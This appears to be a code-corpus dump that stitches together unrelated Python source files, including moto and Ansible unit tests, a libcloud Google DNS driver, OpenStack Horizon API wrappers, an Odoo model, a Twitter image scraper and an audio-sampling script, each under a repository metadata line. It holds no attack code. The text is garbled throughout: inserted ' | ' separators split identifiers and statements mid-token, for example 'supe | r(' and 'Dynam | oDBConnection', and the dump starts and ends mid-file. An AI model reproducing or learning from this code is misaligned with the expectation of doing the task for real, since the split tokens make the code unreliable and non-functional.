def describe_reserved_instances_offerings(self):
raise NotImplementedError(
"ReservedInstances.describe_reserved_instances_offerings is not yet implemented"
)
def purchase_reserved_instances_offering(self):
if self.is_not_dryrun("PurchaseReservedInstances"):
raise NotImplementedError(
"ReservedInstances.purchase_reserved_instances_offering is not yet implemented"
)
|
alxgu/ansible | test/units/modules/network/onyx/test_onyx_config.py | Python | gpl-3.0 | 4,615 | 0.001517 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.onyx import onyx_config
from units.modules.utils import set_module_args
from .onyx_module import TestOnyxModule, load_fixture
class TestOnyxConfigModule(TestOnyxModule):
module = onyx_config
def setUp(self):
supe | r(TestOnyxConfigModule, self).setUp()
self.mock_get_co | nfig = patch('ansible.modules.network.onyx.onyx_config.get_config')
self.get_config = self.mock_get_config.start()
self.mock_load_config = patch('ansible.modules.network.onyx.onyx_config.load_config')
self.load_config = self.mock_load_config.start()
self.mock_run_commands = patch('ansible.modules.network.onyx.onyx_config.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestOnyxConfigModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None, transport='cli'):
config_file = 'onyx_config_config.cfg'
self.get_config.return_value = load_fixture(config_file)
self.load_config.return_value = None
def test_onyx_config_unchanged(self):
src = load_fixture('onyx_config_config.cfg')
set_module_args(dict(src=src))
self.execute_module()
def test_onyx_config_src(self):
src = load_fixture('onyx_config_src.cfg')
set_module_args(dict(src=src))
commands = [
'interface mlag-port-channel 2']
self.execute_module(changed=True, commands=commands, is_updates=True)
def test_onyx_config_backup(self):
set_module_args(dict(backup=True))
result = self.execute_module()
self.assertIn('__backup__', result)
def test_onyx_config_save(self):
set_module_args(dict(lines=['hostname foo'], save='yes'))
self.execute_module(changed=True)
self.assertEqual(self.run_commands.call_count, 0)
self.assertEqual(self.get_config.call_count, 1)
self.assertEqual(self.load_config.call_count, 1)
args = self.load_config.call_args[0][1]
self.assertIn('configuration write', args)
def test_onyx_config_lines_wo_parents(self):
set_module_args(dict(lines=['hostname foo']))
commands = ['hostname foo']
self.execute_module(changed=True, commands=commands, is_updates=True)
def test_onyx_config_before(self):
set_module_args(dict(lines=['hostname foo'], before=['test1', 'test2']))
commands = ['test1', 'test2', 'hostname foo']
self.execute_module(changed=True, commands=commands, sort=False, is_updates=True)
def test_onyx_config_after(self):
set_module_args(dict(lines=['hostname foo'], after=['test1', 'test2']))
commands = ['hostname foo', 'test1', 'test2']
self.execute_module(changed=True, commands=commands, sort=False, is_updates=True)
def test_onyx_config_before_after(self):
set_module_args(dict(lines=['hostname foo'],
before=['test1', 'test2'],
after=['test3', 'test4']))
commands = ['test1', 'test2', 'hostname foo', 'test3', 'test4']
self.execute_module(changed=True, commands=commands, sort=False, is_updates=True)
def test_onyx_config_config(self):
config = 'hostname localhost'
set_module_args(dict(lines=['hostname router'], config=config))
commands = ['hostname router']
self.execute_module(changed=True, commands=commands, is_updates=True)
def test_onyx_config_match_none(self):
lines = ['hostname router']
set_module_args(dict(lines=lines, match='none'))
self.execute_module(changed=True, commands=lines, is_updates=True)
|
thdb-theo/Zombie-Survival | docs/assets/Tools/build_cython.py | Python | mit | 483 | 0 | from distutils.core import setup
from setuptools import Extension
from Cython.Build import cythonize
from Cython.Distutils | import build_ext
extensions = [
Extension("src.cython_.angle_between", ["src/cython_/angle_between.pyx"]),
Extension("src.cython_.collide", ["src/cython_/collide.pyx"]),
Extension("tests.experiment.testcy", ["tests/e | xperiment/testcy.pyx"])
]
setup(
ext_modules=cythonize(extensions),
cmdclass={"build_ext": build_ext},
)
|
jamesyin96/conference_central | settings.py | Python | apache-2.0 | 494 | 0.002024 | #!/usr/bin/env python
"""settings.py
U | dacity conference server-side Python App Engine app user settings
$Id$
created/forked from conference.py by wesc on 2014 may 24
"""
# Replace the following lines with client IDs obtained from the APIs
# Console or Cloud Console.
WEB_CLIENT_ID = '86908364842-sk7dtpvg5of9fr95pmgkndcg9r1t4osv.apps.googleusercontent.com'
ANDROID_CLIENT_ID = ' | replace with Android client ID'
IOS_CLIENT_ID = 'replace with iOS client ID'
ANDROID_AUDIENCE = WEB_CLIENT_ID
|
levisimons/CRASHLACMA | CRASHLACMA/twitter_json_parser.py | Python | cc0-1.0 | 2,983 | 0.041234 | #!/usr/bin/python
import json
from pprint import pprint
import re
import urllib
import time
from geopy import geocoders
import Image
import os
# TODO: handle test cases
# testcases:
# hollywood & vine, hollywood and vine
# order of operations: hashtag, img, address, other text.
# hashtag allcaps or lowercase
# uploaded image, link to hosted image
# multiple urls? currently hard-coded to only accept the first url seen. probably best this way.
class TwitterJsonParser(): |
# parser useful fields from file of json tweet objects
def get_data_from_tweets(self, input_data):
g = geocoders.GoogleV3()
tweet_data = []
processed_tweets = []
with open(input_data) as f:
for line in f:
if line.strip():
tweet_data = json.loads(line)
tweet = tweet_data["text"]
# scrub out any @mentions or #hashtags to leave behind address / text
tweet_text = ' '.join(re.sub("(@[A-Za-z0-9]+)|(#[A-Za-z0-9]+)|(\ | w+:\/\/\S+)"," ",tweet).split())
# geocode address to lat/long
address, (lat, lng) = g.geocode(tweet_text)
# TODO: this is a good place to validate the address for an LA coordinate.
# if not LA, toss in a bucket to be human-examined
# img uploaded via twitter
if tweet_data["entities"].get('media'):
print "DEBUG: img uploaded"
img_url = tweet_data["entities"]["media"][0]["media_url"]
# if img passed as url
else:
print "DEBUG: img as url"
img_url = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', tweet)[0]
print("tweet: %s") % tweet
print("tweet_text: %s, img_url: %s") % (tweet_text, img_url)
print("address: %s, lat: %s, lng: %s") % (address, lat, lng)
self.save_img_from_tweet(str(lat), str(lng), img_url)
processed_tweets.extend([address, str(lat), str(lng), img_url])
return processed_tweets
# this is run on one tweet at a time
def save_img_from_tweet(self, lat, lng, img_url):
DIR_FINISHED_IMGS = '../data_finished_images'
IMG_NAME = lat + '_' + lng + '_.PNG'
if (False == os.path.isfile(DIR_FINISHED_IMGS + '/' + IMG_NAME)):
# save url to disk with address as filename
try:
file = urllib.urlretrieve(img_url, DIR_FINISHED_IMGS + '/' + IMG_NAME)
print("Saved: %s" % DIR_FINISHED_IMGS + '/' + IMG_NAME)
except IOError, e:
print 'could not retrieve %s' % IMG_NAME
try:
im = Image.open(DIR_FINISHED_IMGS + '/' + IMG_NAME)
# TODO: need to figure out what thumbnail size looks best on projector
im2 = im.resize((40, 40), Image.NEAREST)
im2.save(DIR_FINISHED_IMGS + '/thumb_' + IMG_NAME)
except IOError, e:
print 'could not open resize and save %s' % IMG_NAME
time.sleep(1.5)
print("--------------------------------------------------------") # DEBUG
else:
print("file already exists. Skipping %s") % DIR_FINISHED_IMGS + '/' + IMG_NAME
return
return
|
im-auld/moto | tests/test_dynamodb2/test_dynamodb_table_without_range_key.py | Python | apache-2.0 | 14,869 | 0.000538 | from __future__ import unicode_literals
import boto
import boto3
from boto3.dynamodb.conditions import Key
import sure # noqa
from freezegun import freeze_time
from boto.exception import JSONResponseError
from moto import mock_dynamodb2
from tests.helpers import requires_boto_gte
try:
from boto.dynamodb2.fields import HashKey
from boto.dynamodb2.table import Table
from boto.dynamodb2.table import Item
from boto.dynamodb2.exceptions import ConditionalCheckFailedException, ItemNotFound
except ImportError:
pass
def create_table():
table = Table.create('messages', schema=[
HashKey('forum_name')
], throughput={
'read': 10,
'write': 10,
})
return table
@requires_boto_gte("2.9")
@mock_dynamodb2
@freeze_time("2012-01-14")
def test_create_table():
create_table()
expected = {
'Table': {
'AttributeDefinitions': [
{'AttributeName': 'forum_name', 'AttributeType': 'S'}
],
'ProvisionedThroughput': {
'NumberOfDecreasesToday': 0, 'WriteCapacityUnits': 10, 'ReadCapacityUnits': 10
},
'TableSizeBytes': 0,
'TableName': 'messages',
'TableStatus': 'ACTIVE',
'KeySchema': [
{'KeyType': 'HASH', 'AttributeName': 'forum_name'}
],
'ItemCount': 0, 'CreationDateTime': 1326499200.0,
'GlobalSecondaryIndexes': [],
'LocalSecondaryIndexes': []
}
}
conn = boto.dynamodb2.connect_to_region(
'us-west-2',
aws_access_key_id="ak",
aws_secret_access_key="sk"
)
conn.describe_table('messages').should.equal(expected)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_delete_table():
create_table()
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.list_tables()["TableNames"].should.have.length_of(1)
conn.delete_table('messages')
conn.list_tables()["TableNames"].should.have.length_of(0)
conn.delete_table.when.called_with('messages').should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_update_table_throughput():
table = create_table()
table.throughput["read"].should.equal(10)
table.throughput["write"].should.equal(10)
table.update(throughput={
'read': 5,
'write': 6,
})
table.throughput["read"].should.equal(5)
table.throughput["write"].should.equal(6)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_add_and_describe_and_update():
table = create_table()
data = {
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
}
table.put_item(data=data)
returned_item = table.get_item(forum_name="LOLCat Forum")
returned_item.should_not.be.none
dict(returned_item).should.equal({
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
})
returned_item['SentBy'] = 'User B'
returned_item.save(overwrite=True)
returned_item = table.get_item(
forum_name='LOLCat Forum'
)
dict(returned_item).should.equal({
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
})
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_partial_save():
table = create_table()
data = {
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
}
table.put_item(data=data)
returned_item = table.get_item(forum_name="LOLCat Forum")
returned_item['SentBy'] = 'User B'
returned_item.partial_save()
returned_item = table.get_item(
forum_name='LOLCat Forum'
)
dict(returned_item).should.equal({
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
})
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_put_without_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.put_item.when.called_with(
table_name='undeclared-table',
item={
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
}
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_item_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.get_item.when.called_with(
table_name='undeclared-table',
key={"forum_name": {"S": "LOLCat Forum"}},
).should.throw(JSONResponseError)
@requires_boto_gte("2.30.0")
@mock_dynamodb2
def test_delete_item():
table = create_table()
item_data = {
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item = Item(table, item_data)
item.save()
table.count().should.equal(1)
response = item.delete()
response.should.equal(True)
table.count().should.equal(0)
item.delete().should.equal(False)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_delete_item_with_undeclared_table():
conn = boto.dynamodb2.layer1.Dynam | oDBConnection()
conn.delete_item.when.called_with(
| table_name='undeclared-table',
key={"forum_name": {"S": "LOLCat Forum"}},
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_query():
table = create_table()
item_data = {
'forum_name': 'the-key',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item = Item(table, item_data)
item.save(overwrite=True)
table.count().should.equal(1)
table = Table("messages")
results = table.query(forum_name__eq='the-key')
sum(1 for _ in results).should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_query_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.query.when.called_with(
table_name='undeclared-table',
key_conditions={"forum_name": {"ComparisonOperator": "EQ", "AttributeValueList": [{"S": "the-key"}]}}
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_scan():
table = create_table()
item_data = {
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item_data['forum_name'] = 'the-key'
item = Item(table, item_data)
item.save()
item['forum_name'] = 'the-key2'
item.save(overwrite=True)
item_data = {
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
'ReceivedTime': '12/9/2011 11:36:03 PM',
'Ids': set([1, 2, 3]),
'PK': 7,
}
item_data['forum_name'] = 'the-key3'
item = Item(table, item_data)
item.save()
results = table.scan()
sum(1 for _ in results).should.equal(3)
results = table.scan(SentBy__eq='User B')
sum(1 for _ in results).should.equal(1)
results = table.scan(Body__beginswith='http')
sum(1 for _ in results).should.equal(3)
results = table.scan(Ids__null=False)
sum(1 for _ in results).should.equal(1)
results = table.scan(Ids__null=True)
sum(1 for _ in results).should.equal(2)
results = table.scan(PK__between=[8, 9])
sum(1 for _ in results).should.equal(0)
results = table.scan(PK__between=[5, 8])
sum(1 for _ in results).should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_scan_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.scan.when.called_with(
table_name='undeclared-table',
scan_filter={
"SentBy": {
"AttributeValueList": [{
"S": "User B"}
],
"ComparisonOperator": "EQ"
}
},
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_write_batch():
table = create_table()
with table.batch_write( |
Daniex/horizon | openstack_dashboard/api/base.py | Python | apache-2.0 | 12,076 | 0.000083 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import Sequence # noqa
import logging
from django.conf import settings
from horizon import exceptions
import six
__all__ = ('APIResourceWrapper', 'APIDictWrapper',
'get_service_from_catalog', 'url_for',)
LOG = logging.getLogger(__name__)
class APIVersionManager(object):
"""Object to store and manage API versioning data and utility methods."""
SETTINGS_KEY = "OPENSTACK_API_VERSIONS"
def __init__(self, service_type, preferred_version=None):
self.service_type = service_type
self.preferred = preferred_version
self._active = None
self.supported = {}
# As a convenience, we can drop in a placeholder for APIs that we
# have not yet needed to version. This is useful, for example, when
# panels such as the admin metadata_defs wants to check the active
# version even though it's not explicitly defined. Previously
# this caused a KeyError.
if self.preferred:
self.supported[self.preferred] = {"version": self.preferred}
@property
def active(self):
if self._active is None:
self.get_active_version()
return self._active
def load_supported_version(self, version, data):
self.supported[version] = data
def get_active_version(self):
if self._active is not None:
return self.supported[self._active]
key = getattr(settings, self.SETTINGS_KEY, {}).get(self.service_type)
if key is None:
# TODO(gabriel): support API version discovery here; we'll leave
# the setting in as a way of overriding the latest available
# version.
key = self.preferred
# Since we do a key lookup in the supported dict the type matters,
# let's ensure people know if they use a string when the key isn't.
if isinstance(key, six.string_types):
msg = ('The version "%s" specified for the %s service should be '
'either an integer or a float, not a string.' %
(key, self.service_type))
raise exceptions.ConfigurationError(msg)
# Provide a helpful error message if the specified version isn't in the
# supported list.
if key not in self.supported:
choices = ", ".join(str(k) for k in six.iterkeys(self.supported))
msg = ('%s is not a supported API version for the %s service, '
' choices are: %s' % (key, self.service_type, choices))
raise exceptions.ConfigurationError(msg)
self._active = key
return self.supported[self._active]
def clear_active_cache(self):
self._active = None
class APIResourceWrapper(object):
"""Simple wrapper for api objects.
Define _attrs on the child class and pass in the
api object as the only argument to the constructor
"""
_attrs = []
_apiresource = None # Make sure _apiresource is there even in __init__.
def __init__(self, apiresource):
self._apiresource = apiresource
def __getattribute__(self, attr):
try:
return object.__getattribute__(self, attr)
except AttributeError:
if attr not in self._attrs:
raise
# __getattr__ won't find properties
return getattr(self._apiresource, attr)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__,
dict((attr, getattr(self, attr))
for attr in self._attrs
if hasattr(self, attr)))
def to_dict(self):
obj = {}
for key in self._attrs:
obj[key] = getattr(self._apiresource, key, None)
return obj
class APIDictWrapper(object):
"""Simple wrapper for api dictionaries
Some api calls return dictionaries. This class provides identical
behavior as APIResourceWrapper, except that it will also behave as a
dictionary, in addition to attribute accesses.
Attribute access is the preferred method of access, to be
consistent with api resource objects from novaclient.
"""
_apidict = {} # Make sure _apidict is there even in __init__.
def __init__(self, apidict):
self._apidict = apidict
def __getattribute__(self, attr):
try:
return object.__getattribute__(self, attr)
except AttributeError:
if attr not in self._apidict:
raise
return self._apidict[attr]
def __getitem__(self, item):
try:
return getattr(self, item)
except (AttributeError, TypeError) as e:
# caller is expecting a KeyError
raise KeyError(e)
def __contains__(self, item):
try:
return hasattr(self, item)
except TypeError:
return False
def get(self, item, default=None):
try:
return getattr(self, item)
except (AttributeError, TypeError):
return default
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self._apidict)
def to_dict(self):
return self._apidict
class Quota(object):
"""Wrapper for individual limits in a quota."""
def __init__(self, name, limit):
self.name = name
self.limit = limit
def __repr__(self):
return "<Quota: (%s, %s)>" % (self.name, self.limit)
class QuotaSet(Sequence):
"""Wrapper for client QuotaSet objects which turns the individual quotas
into Quota objects for easier handling/iteration.
`QuotaSet` objects support a mix of `list` and `dict` methods; you can use
the bracket notation (`qs["my_quota"] = 0`) to add new quota values, and
use the `get` method to retrieve a specific quota, but otherwise it
behaves much like a list or tuple, particularly in supporting iteration.
"""
def __init__(self, apiresource=None):
self.items = []
if apiresource:
if hasattr(apiresource, '_info'):
items = apiresource._info.items()
else:
items = apiresource.items()
for k, v in items:
if k == 'id':
continue
self[k] = v
def __setitem__(self, k, v):
v = int(v) if v is not None else v
q = Quota(k, v)
self.items.append(q)
def __getitem__(self, index):
return self.items[index]
def __add__(s | elf, other):
"""Merge another QuotaSet into this one. Existing quotas are
not overridden.
"""
if not isinstance(other, QuotaSet):
msg = "Can only add QuotaSet to Qu | otaSet, " \
"but received %s instead" % type(other)
raise ValueError(msg)
for item in other:
if self.get(item.name).limit is None:
self.items.append(item)
return self
def __len__(self):
return len(self.items)
def __repr__(self):
return repr(self.items)
def get(self, key, default=None):
match = [quota for quota in self.items if quota.name == key]
return match.pop() if len(match) else Quota(key, default)
def add(self, other):
return self.__add__(other)
def get_service_from_catalog(catalog, service_type):
if catalog:
|
eicher31/compassion-modules | mobile_app_connector/models/privacy_statement.py | Python | agpl-3.0 | 950 | 0 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2019 Compassion CH (http://www.compassion.ch)
# @author: Emanuel Cino <ecino@compassion.ch>
# @author: Théo Nikles <theo.nikles@gmail.com>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from ..controllers.mobile_app_controller import _get_lang
from odoo import models, fields
class PrivacyStatementAgreement(models.Model):
_inherit = 'privacy.statement.agreement'
origin_signature = fields.Selection(
selection_add=[('mobile_app', 'Mobile App Registration')])
def mobile_get_privacy_notice(self, **params | ):
lang = _get_lang(self, params)
return {'PrivacyNotice': self.env['compassion.privacy.statement']
| .with_context(lang=lang)
.sudo().search([], limit=1).text}
|
Hybrid-Cloud/badam | patches_tool/aws_patch/aws_deps/libcloud/dns/drivers/google.py | Python | apache-2.0 | 11,423 | 0.000525 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'GoogleDNSDriver'
]
# API docs: https://cloud.google.com/dns/api/v1beta1
API_VERSION = 'v1beta1'
import re
from libcloud.common.google import GoogleResponse, GoogleBaseConnection
from libcloud.common.google import ResourceNotFoundError
from libcloud.dns.types import Provider, RecordType
from libcloud.dns.types import ZoneDoesNotExistError, RecordDoesNotExistError
from libcloud.dns.base import DNSDriver, Zone, Record
class GoogleDNSResponse(GoogleResponse):
pass
class GoogleDNSConnection(GoogleBaseConnection):
host = "www.googleapis.com"
responseCls = GoogleDNSResponse
def __init__(self, user_id, key, secure, auth_type=None,
credential_file=None, project=None, **kwargs):
super(GoogleDNSConnection, self).\
__init__(user_id, key, secure=secure, auth_type=auth_type,
credential_file=credential_file, **kwargs)
self.request_path = '/dns/%s/projects/%s' % (API_VERSION, project)
class GoogleDNSDriver(DNSDriver):
type = Provider.GOOGLE
name = 'Google DNS'
connectionCls = GoogleDNSConnection
website = 'https://cloud.google.com/'
RECORD_TYPE_MAP = {
RecordType.A: 'A',
RecordType.AAAA: 'AAAA',
RecordType.CNAME: 'CNAME',
RecordType.MX: 'MX',
RecordType.NS: 'NS',
RecordType.PTR: 'PTR',
RecordType.SOA: 'SOA',
RecordType.SPF: 'SPF',
RecordType.SRV: 'SRV',
RecordType.TXT: 'TXT',
}
def __init__(self, user_id, key, project=None, auth_type=None, scopes=None,
**kwargs):
self.auth_type = auth_type
self.project = project
self.scopes = scopes
if not self.project:
raise ValueError('Project name must be specified using '
'"project" keyword.')
super(GoogleDNSDriver, self).__init__(user_id, key, **kwargs)
def iterate_zones(self):
"""
Return a generator to iterate over available zones.
:rtype: ``generator`` of :class:`Zone`
"""
return self._get_more('zones')
def iterate_records(self, zone):
"""
Return a generator to iterate over records for the provided zone.
:param zone: Zone to list records for.
:type zone: :class:`Zone`
:rtype: ``generator`` of :class:`Record`
"""
return self._get_more('records', zone=zone)
def get_zone(self, zone_id):
"""
Return a Zone instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:rtype: :class:`Zone`
"""
request = '/managedZones/%s' % (zone_id)
try:
response = self.connection.request(request, method='GET').object
except ResourceNotFoundError:
raise ZoneDoesNotExistError(value='',
driver=self.connection.driver,
zone_id=zone_id)
return self._to_zone(response)
def get_r | ecord(self, zone_id, record_id):
"""
|
Return a Record instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:param record_id: ID of the required record
:type record_id: ``str``
:rtype: :class:`Record`
"""
(record_type, record_name) = record_id.split(':', 1)
params = {
'name': record_name,
'type': record_type,
}
request = '/managedZones/%s/rrsets' % (zone_id)
try:
response = self.connection.request(request, method='GET',
params=params).object
except ResourceNotFoundError:
raise ZoneDoesNotExistError(value='',
driver=self.connection.driver,
zone_id=zone_id)
if len(response['rrsets']) > 0:
zone = self.get_zone(zone_id)
return self._to_record(response['rrsets'][0], zone)
raise RecordDoesNotExistError(value='', driver=self.connection.driver,
record_id=record_id)
def create_zone(self, domain, type='master', ttl=None, extra=None):
"""
Create a new zone.
:param domain: Zone domain name (e.g. example.com.) with a \'.\'
at the end.
:type domain: ``str``
:param type: Zone type (master is the only one supported).
:type type: ``str``
:param ttl: TTL for new records. (unused)
:type ttl: ``int``
:param extra: Extra attributes (driver specific). (optional)
:type extra: ``dict``
:rtype: :class:`Zone`
"""
name = None
description = ''
if extra:
description = extra.get('description')
name = extra.get('name')
if name is None:
name = self._cleanup_domain(domain)
data = {
'dnsName': domain,
'name': name,
'description': description,
}
request = '/managedZones'
response = self.connection.request(request, method='POST',
data=data).object
return self._to_zone(response)
def create_record(self, name, zone, type, data, extra=None):
"""
Create a new record.
:param name: Record name fully qualified, with a \'.\' at the end.
:type name: ``str``
:param zone: Zone where the requested record is created.
:type zone: :class:`Zone`
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: Extra attributes. (optional)
:type extra: ``dict``
:rtype: :class:`Record`
"""
ttl = data.get('ttl', 0)
rrdatas = data.get('rrdatas', [])
data = {
'additions': [
{
'name': name,
'type': type,
'ttl': int(ttl),
'rrdatas': rrdatas,
}
]
}
request = '/managedZones/%s/changes' % (zone.id)
response = self.connection.request(request, method='POST',
data=data).object
return self._to_record(response['additions'][0], zone)
def delete_zone(self, zone):
"""
Delete a zone.
Note: This will delete all the records belonging to this zone.
:param zone: Zone to delete.
:type zone: :class:`Zone`
:rtype: ``bool``
"""
request = '/managedZones/%s' % (zone.id)
response = self.connection.request(request, method='DELETE')
return response.success()
def delete_record(self, record):
"""
Delete a record.
:param record: Record to delete.
:type record: :class:`Record`
:rtype: ``bool``
"""
|
cornell-cup/cs-minibot-platform | python-interface/src/MiniBotFramework/Sound/live_audio_sample.py | Python | apache-2.0 | 3,940 | 0.038071 | import numpy as np
import matplotlib.pyplot as plt #Used for graphing audio tests
import pyaudio as pa
import wave
from time import sleep
#Constants used for sampling audio
CHUNK = 1024
FORMAT = pa.paInt16
CHANNELS = 1
RATE = 44100 # Must match rate at which mic actually samples sound
RECORD_TIMEFRAME = 1.0 #Time in seconds
OUTPUT_FILE = "sample.wav"
#Flag for plotting sound input waves for debugging and implementation purposes
TESTING_GRAPHS = True
def sampleAudio(wav_name=OUTPUT_FILE):
"""Samples audio from the microphone for a given period of time.
The output file is saved as [wav_name]
Code here taken from the front page of:
< https://people.csail.mit.edu/hubert/pyaudio/ > """
# Open the recording session
rec_session | = pa.PyAudio()
stream = rec_session.open(format=FORMAT,
channels=CHANNELS,rate=RATE,input=True,frames_per | _buffer=CHUNK)
print("Start recording")
frames = []
# Sample audio frames for given time period
for i in range(0, int(RATE/CHUNK*RECORD_TIMEFRAME)):
data = stream.read(CHUNK)
frames.append(data)
# Close the recording session
stream.stop_stream()
stream.close()
rec_session.terminate()
#Create the wav file for analysis
output_wav = wave.open(wav_name,"wb")
output_wav.setnchannels(CHANNELS)
output_wav.setsampwidth(rec_session.get_sample_size(FORMAT))
output_wav.setframerate(RATE)
output_wav.writeframes(b''.join(frames))
output_wav.close()
def getAvgFreq(wav_file=OUTPUT_FILE):
"""Analyzes the audio sample [wav_file] (must be a 16-bit WAV file with
one channel) and returns maximum magnitude of the most prominent sound
and the frequency thresholds it falls between.
Basic procedure of processing audio taken from:
< http://samcarcagno.altervista.org/blog/basic-sound-processing-python/ >"""
#Open wav file for analysis
sound_sample = wave.open(wav_file, "rb")
#Get sampling frequency
sample_freq = sound_sample.getframerate()
#Extract audio frames to be analyzed
# audio_frames = sound_sample.readframes(sound_sample.getnframes())
audio_frames = sound_sample.readframes(1024)
converted_val = []
#COnvert byte objects into frequency values per frame
for i in range(0,len(audio_frames),2):
if ord(audio_frames[i+1])>127:
converted_val.append(-(ord(audio_frames[i])+(256*(255-ord(audio_frames[i+1])))))
else:
converted_val.append(ord(audio_frames[i])+(256*ord(audio_frames[i+1])))
#Fit into numpy array for FFT analysis
freq_per_frame = np.array(converted_val)
# Get amplitude of soundwave section
freq = np.fft.fft(freq_per_frame)
amplitude = np.abs(freq)
amplitude = amplitude/float(len(freq_per_frame))
amplitude = amplitude**2
#Get bins/thresholds for frequencies
freqbins = np.fft.fftfreq(CHUNK,1.0/sample_freq)
x = np.linspace(0.0,1.0,1024)
# Plot data if need visualization
if(TESTING_GRAPHS):
#Plot raw data
plt.plot(converted_val)
plt.title("Raw Data")
plt.xlabel("Time (ms)")
plt.ylabel("Frequency (Hz)")
plt.show()
#Plot frequency histogram
plt.plot(freqbins[:16],amplitude[:16])
plt.title("Processed Data")
plt.xlabel("Frequency Bins")
plt.ylabel("Magnitude")
plt.show()
#Get the range that the max amplitude falls in. This represents the loudest noise
magnitude = np.amax(amplitude)
loudest = np.argmax(amplitude)
lower_thres = freqbins[loudest]
upper_thres = (freqbins[1]-freqbins[0])+lower_thres
#Close wav file
sound_sample.close()
#Return the magnitude of the sound wave and its frequency threshold for analysis
return magnitude, lower_thres, upper_thres
#Use for testing microphone input
if __name__ == "__main__":
# print("Wait 3 seconds to start...")
# sleep(3)
print("Recording!")
sampleAudio(OUTPUT_FILE)
print("Stop recording!")
print("Analyzing...")
mag, lower, upper = getAvgFreq(OUTPUT_FILE)
print("Magnitude is "+str(mag))
print("Lower bin threshold is "+str(lower))
print("Upper bin threshold is "+str(upper))
|
ioef/tlslite-ng | unit_tests/test_tlslite_utils_ecc.py | Python | lgpl-2.1 | 8,381 | 0.000716 |
# Copyright (c) 2014, Hubert Kario
#
# See the LICENSE file for legal information regarding use of this file.
# compatibility with Python 2.6, for that we need unittest2 package,
# which is not available on 3.3 or 3.4
try:
import unittest2 as unittest
except ImportError:
import unittest
from tlslite.utils.ecc import decodeX962Point, encodeX962Point, getCurveByName,\
getPointByteSize
import ecdsa
class TestEncoder(unittest.TestCase):
def test_encode_P_256_point(self):
point = ecdsa.NIST256p.generator * 200
